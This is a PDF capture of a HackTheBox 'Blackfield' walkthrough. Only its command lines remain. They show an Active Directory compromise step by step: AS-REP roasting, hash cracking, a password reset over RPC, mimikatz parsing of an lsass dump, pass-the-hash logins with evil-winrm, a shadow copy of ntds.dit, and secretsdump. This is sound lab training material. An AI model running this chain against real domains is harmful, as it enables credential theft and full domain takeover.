Blackfield HacktheBox Walkthrough PDF

Download as pdf or txt
Download as pdf or txt
You are on page 1of 23

Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.

in/blackfield-hackthebox-walkthrough/

1 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

2 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

1. nmap -sV 10.129.45.226

1. smbclient -L 10.129.45.226

3 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

4 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

1. impacket-GetNPUsers -dc-ip 10.129.45.226 blackfield.local/ -usersfile username.txt >


result.txt

5 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

1. john --wordlist=/usr/share/wordlists/rockyou.txt hash

1. rpcclient -U support%#00^BlackKnight 10.129.45.226

6 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

1. bloodhound-python -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.129.45.226


-c all

7 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

8 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

9 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

1. setuserinfo2 audit2020 23 'Password@1'

10 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

1. smbclient -U 'audit2020' //10.129.45.226/forensic


2. get lsass.zip

11 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

1. privilege:debug
2. sekurlsa::minidump lsass.DMP

12 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

1. evil-winrm -i 10.129.45.226 -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'

13 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

1. leafpad raj.dsh
2. set context persistent nowriters
3. add volume c: alias raj
4. create
5. expose %raj% z:
6. unix2dos raj.dsh

1. mkdir temp
2. cd temp
3. upload raj.dsh

14 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

1. cd C:\Temp
2. upload raj.dsh
3. diskshadow /s raj.dsh
4. robocopy /b z:\windows\ntds . ntds.dit

15 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

16 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

1. reg save hklm\system C:\Temp\system


2. cd C:\Temp
3. download ntds.dit
4. download system

17 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

1. impacket-secretsdump -ntds ntds.dit -system system local

1. evil-winrm -i 10.129.45.226 -u administrator -H '184fb5e5178480be64824d4cd53b99ee'

18 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

Tweets from @hackinarticles

Hacking Articles
@hackinarticles · 8h

Network Penetration Testing Course (Online)

Hurry up, get enrolled yourself with IGNITE TECHNOLOGIES’ fully exclusive Training
Program “Network Pen-testing Advance Cybersecurity Training Program.”

Hurry UP, Register Now!


bit.ly/ignitetechnolo…

#infosec #cybersecurity

32

Hacking Articles
@hackinarticles · 8h

Pic of the Day

#infosec #cybersecurity #cybersecuritytips #pentesting #cybersecurityawareness


#informationsecurity

20 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

21 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

22 of 23 5/11/2023, 10:42 AM
Blackfield HacktheBox Walkthrough - Hacking Articles https://www.hackingarticles.in/blackfield-hackthebox-walkthrough/

23 of 23 5/11/2023, 10:42 AM

You might also like